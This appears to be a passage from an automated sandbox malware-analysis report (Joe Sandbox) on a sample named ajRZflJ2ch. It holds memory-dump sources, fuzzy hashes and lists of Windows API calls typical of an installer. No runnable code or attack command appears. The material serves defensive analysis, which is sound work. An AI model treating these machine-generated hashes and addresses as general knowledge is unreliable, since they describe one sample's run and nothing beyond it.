                                                                                                            • Opcode Fuzzy Hash: fd1700090fd4a0e1bdb1b0dea869fbe059662eec367a6d429b7acf920fa3ca2e
                                                                                                            • Instruction Fuzzy Hash: EBC1D174E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E85DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bb02374c960d2214297afca8a93f1fff25607ed9b0469249bedfde05cec05a2
                                                                                                            • Instruction ID: b8f95af70e30062fab432868a495a835a79f62b3866cf39e77a7751b8038351c
                                                                                                            • Opcode Fuzzy Hash: 5bb02374c960d2214297afca8a93f1fff25607ed9b0469249bedfde05cec05a2
                                                                                                            • Instruction Fuzzy Hash: 0BC1B174E00258CFDB14DFA9C994B9DBBB2BF89300F1081A9D809AB365DB359E85DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f1dd331083208cf6dfaf6741fffdd0e76118732292470c1777c2f76091a6cf4c
                                                                                                            • Instruction ID: 925b63c5249d24ee882aea1e95456ace9799d930f8d32c9b36b6d074a52f9cd5
                                                                                                            • Opcode Fuzzy Hash: f1dd331083208cf6dfaf6741fffdd0e76118732292470c1777c2f76091a6cf4c
                                                                                                            • Instruction Fuzzy Hash: 13C1C274E00258CFDB14DFA9C994B9DBBB2BF89300F6080A9D809AB355DB359E85DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37eaecc91aa06fae9e91d5126e6e32a3d3ab3eb7b4146da41e214d3334698fc7
                                                                                                            • Instruction ID: 0fcf10b8798166b262aa4d9db8c093ccb526f9be01b201d2181b1f459249e18f
                                                                                                            • Opcode Fuzzy Hash: 37eaecc91aa06fae9e91d5126e6e32a3d3ab3eb7b4146da41e214d3334698fc7
                                                                                                            • Instruction Fuzzy Hash: 2DC1B274E00218CFDB14DFA9C994B9DBBB2BF89300F6080A9D809AB355DB359E85DF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e53e8d981a8cb14599ce95b08284c9e1e3f57a9292e0504501efd3948b771af5
                                                                                                            • Instruction ID: 5e59a75162a1d02f68fac352ce911395a3d4cafbfd1bdc2c4fefe2890f063f58
                                                                                                            • Opcode Fuzzy Hash: e53e8d981a8cb14599ce95b08284c9e1e3f57a9292e0504501efd3948b771af5
                                                                                                            • Instruction Fuzzy Hash: 0CC1C274E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E85DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 560316c8083d0a6a28cded5b96f0f9cdcc1799699943e997b9115b33ada48f94
                                                                                                            • Instruction ID: c25dbb419e9bcc3a7f38dc069d3c1b8ca77831821ee4934f3f3a3e1c17f8d132
                                                                                                            • Opcode Fuzzy Hash: 560316c8083d0a6a28cded5b96f0f9cdcc1799699943e997b9115b33ada48f94
                                                                                                            • Instruction Fuzzy Hash: 20C1C274E00258CFEB14DFA9C994B9DBBB2BF89300F1081A9E809AB355DB359D81DF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 33b9974f131b76beb4aef8fc28135f27a450a981d73fbc0ef48006fc1f693b7c
                                                                                                            • Instruction ID: 3b9f2ae23df7a601fd5aeaf411a462e6043126b2cdd385538281a10c381239e6
                                                                                                            • Opcode Fuzzy Hash: 33b9974f131b76beb4aef8fc28135f27a450a981d73fbc0ef48006fc1f693b7c
                                                                                                            • Instruction Fuzzy Hash: 64C1C274E00258CFEB14DFA9C994B9DBBB2BF89300F5080A9D809AB355DB359E81DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a8e5895a4fd06be9505eb4c0df6f18388d32d621ec01a4bd25f27435a0eee7e3
                                                                                                            • Instruction ID: 42297b7f53808e1b612e78a0c7a483d21d25fd65ac31e6652ba16f155f4dc48e
                                                                                                            • Opcode Fuzzy Hash: a8e5895a4fd06be9505eb4c0df6f18388d32d621ec01a4bd25f27435a0eee7e3
                                                                                                            • Instruction Fuzzy Hash: 3AD06775D142188BCB11DFA99C402ECF770AB99311F0124A6954DAB200DB719A908F57
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                            • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                              • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                            • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                            • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                            • EmptyClipboard.USER32 ref: 004058B7
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                            • CloseClipboard.USER32 ref: 00405912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: (7B${
                                                                                                            • API String ID: 590372296-525222780
                                                                                                            • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                            • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                            • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                            • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                            • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                            • DestroyWindow.USER32 ref: 00403EF3
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403FF9
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                            • SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                            • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                            • String ID: (7B
                                                                                                            • API String ID: 184305955-3251261122
                                                                                                            • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                            • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                            • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                            • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                            APIs
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,75573420,00435000,00000000), ref: 00403B59
                                                                                                            • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                            • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                            • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                            • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-1425696872
                                                                                                            • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                            • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                            • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                            • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                            • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
                                                                                                            • GetSysColor.USER32(?), ref: 004045FE
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                            • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                            • SetCursor.USER32(00000000), ref: 00404720
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                            • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                            • SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: N
                                                                                                            • API String ID: 3103080414-1130791706
                                                                                                            • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                            • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                            • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                            • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                            • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                              • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                              • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                              • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$A
                                                                                                            • API String ID: 2624150263-3645020878
                                                                                                            • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                            • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                            • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                            • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                            • wsprintfA.USER32 ref: 004060B3
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                            • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                            • API String ID: 2171350718-461813615
                                                                                                            • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
